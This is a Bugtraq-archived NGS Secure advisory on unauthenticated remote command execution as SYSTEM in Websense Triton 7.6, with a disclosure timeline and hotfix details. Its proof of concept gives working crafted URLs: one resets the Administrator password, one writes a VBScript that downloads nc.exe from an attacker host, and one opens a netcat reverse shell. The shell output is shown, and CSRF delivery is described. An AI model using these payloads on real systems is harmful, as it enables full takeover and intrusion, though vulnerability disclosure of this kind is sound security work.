Bugtraq mailing list archives

NGS00140 Technical Advisory: Websense Triton 7.6 - unauthenticated remote command execution as SYSTEM


From: "Research@NGSSecure" <research () ngssecure com>
Date: Mon, 30 Apr 2012 10:06:11 +0000

=======
Summary
=======
Name: Websense (Triton 7.6) Unauthenticated remote command execution as SYSTEM 
Release Date: 30 April 2012
Reference: NGS00140
Discoverer: Ben Williams <ben.williams () ngssecure com>
Vendor: Websense
Vendor Reference: 
Systems Affected: 
Risk: Critical
Status: Published

========
TimeLine
========
Discovered:  1 November 2011
Released:  2 November 2011
Approved:  2 November 2011
Reported:  2 November 2011
Fixed:  2 December 2011
Published: 30 April 2012

===========
Description
===========
Websense (Triton 7.6) Unauthenticated remote command execution as SYSTEM

Websense is one of the world's best known web-filter products.

Websense (Triton 7.6) is vulnerable to unauthenticated remote command execution as SYSTEM.

This exploitable via a crafted URL.

There is some character-filtering and substitution in the URL (possibly because this is OS-injection via 
Perl-injection) these can be worked around, to create/delete/modifiy files, run commands, and ultimately control the 
system

Many commands can be delivered via a single GET request, so an external attacker could get a reverse-shell payload 
delivered via CSRF (via any internal user), as long as they can find the proxy address in advance (or guess which 
subnet it is in).

=================
Technical Details
=================
I. VULNERABILITY
-------------------------
Websense (Triton 7.6) Unauthenticated remote command execution as SYSTEM

II. BACKGROUND
-------------------------
Websense is one of the world's best known web-filter products.

The "Triton" administrative UI allows administration of multiple Websense solutions, including their Email, Web, and 
DLP products

http://www.websense.com/

III. DESCRIPTION
-------------------------
Websense (Triton 7.6) is prone to Unauthenticated remote command execution as SYSTEM.

IV. PROOF OF CONCEPT
-------------------------
Affected URL: https://192.168.233.30:9443/explorer_wse/ws_irpt.exe (though there could be other potential vectors for 
introducing executed instructions)

Example which changes the Windows Adminstrator account password to "blah"

https://192.168.233.30:9443/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26net user administrator blah|

This could be very dangerous if the attacker is internal. Other options are available to external attackers such as 
uploading and running a reverse shell via CSRF.

This can be done by 1) creating a vbscript downloader application which downloads nc.exe:

https://192.168.233.30:9443/explorer_wse/ws_irpt.exe?&SendFile=echo
.pdf%26echo strUrl %3d ^"http:^" %2b chr(47) %2b chr(47) %2b ^"192.168.233.11^" %2b chr(47) %2b ^"nc.exe^"> 
http.vbs%26echo StrFile %3d ^"nc.exe^" >> http.vbs%26echo Const HTTPREQUEST_PROXYSETTING_DEFAULT %3d 0
http.vbs%26echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG %3d 0 >>
http.vbs%26echo Const HTTPREQUEST_PROXYSETTING_DIRECT %3d 1 >> http.vbs%26echo Const HTTPREQUEST_PROXYSETTING_PROXY %3d 
2 >> http.vbs%26echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs,
ts >> http.vbs%26echo   Err.Clear >> http.vbs%26echo   Set http %3d Nothing
http.vbs%26echo   Set http %3d
CreateObject(^"WinHttp.WinHttpRequest.5.1^") >> http.vbs%26echo   If http
Is Nothing Then Set http %3d CreateObject(^"WinHttp.WinHttpRequest^") >>
http.vbs%26echo   If http Is Nothing Then Set http %3d
CreateObject(^"MSXML2.ServerXMLHTTP^") >> http.vbs%26echo   If http Is
Nothing Then Set http %3d CreateObject(^"Microsoft.XMLHTTP^") >>
http.vbs%26echo   http.Open ^"GET^", strURL, False >> http.vbs%26echo  
http.Send >> http.vbs%26echo   varByteArray %3d http.ResponseBody >>
http.vbs%26echo   Set http %3d Nothing >> http.vbs%26echo   Set fs %3d
CreateObject(^"Scripting.FileSystemObject^") >> http.vbs%26echo   Set ts
%3d fs.CreateTextFile(StrFile, True) >> http.vbs%26echo   strData %3d ^"^"
http.vbs%26echo   strBuffer %3d ^"^" >> http.vbs%26echo   For lngCounter
%3d 0 to UBound(varByteArray) >> http.vbs%26echo       ts.Write Chr(255 And
Ascb(Midb(varByteArray,lngCounter %2b 1, 1))) >> http.vbs%26echo   Next >>
http.vbs%26echo   ts.Close >> http.vbs%26http.vbs|

2) Running nc.exe

https://192.168.233.30:9443/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26nc.exe 192.168.233.11 443 -e cmd.exe|

3) Remote SYSTEM shell on attackers system

nc -lvvp 443
listening on [any] 443 ...
192.168.233.30: inverse host lookup failed: Unknown server error :
Connection timed out
connect to [192.168.233.11] from (UNKNOWN) [192.168.233.30] 2828 Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Program Files\Websense\Web Security\webroot\Explorer>whoami 
whoami 
nt authority\system

C:\Program Files\Websense\Web Security\webroot\Explorer>dir dir  Volume in drive C has no label.
 Volume Serial Number is 4CA0-BB76

 Directory of C:\Program Files\Websense\Web Security\webroot\Explorer

11/02/2011  11:53 AM    <DIR>          .
11/02/2011  11:53 AM    <DIR>          ..
07/14/2011  11:37 PM             2,529 batchchart.jar
07/14/2011  11:37 PM             3,819 body_components.css
07/14/2011  11:36 PM         3,776,598 cal_legend.exe
07/14/2011  11:37 PM            16,374 catcolors.txt

...etc...

As multiple instructions can be delivered in a single GET request it should be easy to launch this attack via CSRF, and 
because any internal user goes via the proxy the attack can be launched via any internal user clicking on the malicious 
link or visiting the attackers site with a crafted IMG tag.


===============
Fix Information
===============
This issue is addressed in Hotfix 24, which can be downloaded at:
https://www.websense.com/content/mywebsense-hotfixes.aspx

NGS Secure Research
http://www.ngssecure.com


Current thread: